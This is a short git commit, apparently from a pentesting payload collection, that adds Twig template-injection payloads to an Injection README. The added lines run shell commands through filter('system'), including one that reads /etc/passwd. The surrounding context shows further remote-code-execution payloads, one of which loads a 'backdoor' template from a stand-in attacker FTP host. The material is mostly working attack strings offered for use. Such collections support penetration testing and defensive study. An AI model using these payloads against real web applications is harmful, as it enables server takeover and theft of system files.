Added filter(system) twig RCE

2024-12-19 19:06:12 +00:00 · 2020-03-29 23:19:27 +02:00 · 2020-03-29 23:19:27 +02:00 · 8b78c2fe71
commit 8b78c2fe71
parent 231e41a59b
1 changed files with 2 additions and 0 deletions
--- a/Injection/README.md
+++ b/Injection/README.md
@ -157,6 +157,8 @@ $output = $twig > render (
 {{self}}
 {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
+{{['id']|filter('system')}}
+{{['cat\x20/etc/passwd']|filter('system')}}
 ```

 Example with an email passing FILTER_VALIDATE_EMAIL PHP.